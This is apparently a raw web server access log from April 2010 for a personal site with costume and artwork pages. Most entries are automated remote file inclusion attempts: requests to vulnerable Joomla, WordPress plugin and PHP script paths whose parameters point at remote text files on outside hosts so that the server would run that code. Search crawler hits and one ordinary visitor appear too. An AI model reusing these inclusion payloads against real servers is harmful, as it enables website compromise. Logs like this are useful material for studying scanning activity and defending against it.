174.133.171.74 - - [21/Apr/2010:04:37:46 -0500] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.171.74 - - [21/Apr/2010:04:37:52 -0500] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.171.74 - - [21/Apr/2010:04:37:52 -0500] "GET /logs/access_log.1268265600/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
174.133.171.74 - - [21/Apr/2010:04:37:52 -0500] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
174.133.171.74 - - [21/Apr/2010:04:37:54 -0500] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.171.74 - - [21/Apr/2010:04:37:54 -0500] "GET /logs/access_log.1268265600/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
174.133.171.74 - - [21/Apr/2010:04:37:54 -0500] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:38:29 -0500] "GET /logs/access_log.1243382400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
95.0.234.10 - - [21/Apr/2010:04:40:12 -0500] "GET /logs/access_log.1268611200%20%20//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [21/Apr/2010:04:40:26 -0500] "GET //?path%5Bdocroot%5D=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.222.152.66 - - [21/Apr/2010:04:40:26 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.222.152.66 - - [21/Apr/2010:04:40:26 -0500] "GET /logs//?path%5Bdocroot%5D=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:41:03 -0500] "GET /logs/access_log.1184716800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.48 - - [21/Apr/2010:04:41:27 -0500] "GET /logs/access_log.1200614400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.171.74 - - [21/Apr/2010:04:42:30 -0500] "GET /logs/access_log.1221696000/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:43:37 -0500] "GET /logs/access_log.1206576000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [21/Apr/2010:04:44:00 -0500] "GET /logs/access_log.1221696000/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:44:54 -0500] "GET /logs/access_log.1168905600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
95.0.234.10 - - [21/Apr/2010:04:45:06 -0500] "GET /logs/access_log.1268611200%20%20//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.195.112.180 - - [21/Apr/2010:04:45:30 -0500] "GET /logs/access_log.1255392000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.0.234.10 - - [21/Apr/2010:04:47:32 -0500] "GET /logs//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
95.0.234.10 - - [21/Apr/2010:04:47:32 -0500] "GET //frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
95.0.234.10 - - [21/Apr/2010:04:47:32 -0500] "GET /logs/access_log.1220054400//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
95.0.234.10 - - [21/Apr/2010:04:47:44 -0500] "GET //frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
95.0.234.10 - - [21/Apr/2010:04:47:44 -0500] "GET /logs//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
95.0.234.10 - - [21/Apr/2010:04:47:44 -0500] "GET /logs/access_log.1220054400//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:48:05 -0500] "GET /logs/access_log.1159142400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
189.78.119.115 - - [21/Apr/2010:04:48:26 -0500] "GET ///_head.php?_zb_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
207.46.204.236 - - [21/Apr/2010:04:48:27 -0500] "GET /logs/access_log.1184889600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.222.152.66 - - [21/Apr/2010:04:49:24 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:04:50:04 -0500] "GET /logs/access_log.1268265600/index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:04:50:04 -0500] "GET /index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:04:50:05 -0500] "GET /logs/index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:04:50:06 -0500] "GET /logs/access_log.1270684800/index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:50:38 -0500] "GET /logs/access_log.1183593600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.16.18.219 - - [21/Apr/2010:04:51:24 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:04:51:24 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:52:33 -0500] "GET /logs/access_log.1183161600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
95.0.234.10 - - [21/Apr/2010:04:54:22 -0500] "GET /logs/access_log.1212969600//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
95.0.234.10 - - [21/Apr/2010:04:54:25 -0500] "GET /logs/access_log.1212969600//frame.php?framefile=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:55:45 -0500] "GET /logs/access_log.1238544000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.16.18.219 - - [21/Apr/2010:04:56:10 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:04:56:10 -0500] "GET /logs/access_log.1265760000/index0.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:04:57:32 -0500] "GET /logs/mygallerybrowser.php?myPath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:04:57:32 -0500] "GET /mygallerybrowser.php?myPath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:04:57:34 -0500] "GET /mygallerybrowser.php?myPath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:04:57:34 -0500] "GET /logs/mygallerybrowser.php?myPath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:04:57:34 -0500] "GET /logs/access_log.1266451200/mygallerybrowser.php?myPath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:04:57:46 -0500] "GET /logs/access_log.1266451200/mygallerybrowser.php?myPath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:04:58:55 -0500] "GET /logs/access_log.1204588800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.176.148 - - [21/Apr/2010:04:59:15 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:04:59:15 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:04:59:15 -0500] "GET /logs/access_log.1270598400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:04:59:24 -0500] "GET /logs/access_log.1270684800%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:04:59:37 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:04:59:37 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:04:59:37 -0500] "GET /logs/access_log.1270598400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:04:59:43 -0500] "GET /logs/access_log.1270684800%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:01:28 -0500] "GET /logs/access_log.1231632000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:05:03:25 -0500] "GET /logs/access_log.1254355200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.176.148 - - [21/Apr/2010:05:03:45 -0500] "GET /logs/access_log.1270684800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:05:04:14 -0500] "GET /logs/access_log.1270598400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:05:04:20 -0500] "GET /logs/access_log.1270684800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
59.21.247.137 - - [21/Apr/2010:05:05:08 -0500] "GET //config/dbutil.bck.php?confdir=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
59.21.247.137 - - [21/Apr/2010:05:05:08 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
59.21.247.137 - - [21/Apr/2010:05:05:08 -0500] "GET /logs/access_log.1220054400//config/dbutil.bck.php?confdir=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:05:58 -0500] "GET /logs/access_log.1165622400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [21/Apr/2010:05:06:41 -0500] "GET /logs/access_log.1223164800//?path%5Bdocroot%5D=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:07:53 -0500] "GET /logs/access_log.1181865600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:05:10:25 -0500] "GET /logs/access_log.1223424000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.221.130.13 - - [21/Apr/2010:05:12:06 -0500] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:05:12:06 -0500] "GET /logs/access_log.1271030400%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:05:12:06 -0500] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:12:20 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.55.207.94 - - [21/Apr/2010:05:13:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.52 - - [21/Apr/2010:05:15:28 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:05:15:30 -0500] "GET /logs/access_log.1207785600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.72.194.58 - - [21/Apr/2010:05:17:05 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:05 -0500] "GET //?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:05 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:24 -0500] "GET //?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:24 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:43 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:43 -0500] "GET //?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:05:17:43 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:18:03 -0500] "GET /logs/access_log.1162425600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:05:21:17 -0500] "GET /logs/access_log.1251417600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [21/Apr/2010:05:22:27 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:22:27 -0500] "GET /logs/access_log.1270684800%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:22:27 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:22:29 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:22:29 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:22:29 -0500] "GET /logs/access_log.1270684800%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:23:11 -0500] "GET /logs/access_log.1269648000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.176.148 - - [21/Apr/2010:05:23:27 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:05:23:27 -0500] "GET /logs/access_log.1235779200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
174.121.176.148 - - [21/Apr/2010:05:23:27 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://Fix29ID.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
91.76.123.54 - - [21/Apr/2010:05:23:31 -0500] "GET /logs/access_log.1244592000 HTTP/1.1" 404 310 "http://www.bing.com/search?q=%2b%40litana%2eru&filt=all&first=60&FORM=PERE""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
59.21.247.137 - - [21/Apr/2010:05:23:36 -0500] "GET /phphtml.php?htmlclass_path=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
59.21.247.137 - - [21/Apr/2010:05:23:36 -0500] "GET /logs/phphtml.php?htmlclass_path=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
59.21.247.137 - - [21/Apr/2010:05:23:36 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.21.247.137 - - [21/Apr/2010:05:23:46 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.178.188.170 - - [21/Apr/2010:05:23:47 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://www.google.dk/search?q=costume+97&rls=com.microsoft:da:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7SUNA_en&redir_esc=&ei=LdLOS6nYJeGiOM7q9LYP""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:48 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:48 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:48 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:49 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:49 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:49 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:49 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
93.178.188.170 - - [21/Apr/2010:05:23:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
66.249.71.225 - - [21/Apr/2010:05:25:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.94.188 - - [21/Apr/2010:05:25:28 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:25:28 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:25:28 -0500] "GET /logs/access_log.1270598400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:25:33 -0500] "GET /logs/access_log.1270598400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:25:33 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:25:33 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:26:22 -0500] "GET /logs/access_log.1208476800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:05:28:16 -0500] "GET /logs/access_log.1211587200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [21/Apr/2010:05:28:38 -0500] "GET /logs/access_log.1227484800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:28:38 -0500] "GET /logs/access_log.1227484800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:05:29:45 -0500] "GET /logs/access_log.1270684800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:05:30:12 -0500] "GET /logs/access_log.1177977600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.138.115.131 - - [21/Apr/2010:05:31:20 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
124.138.115.131 - - [21/Apr/2010:05:31:21 -0500] "GET //?path%5Bdocroot%5D=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
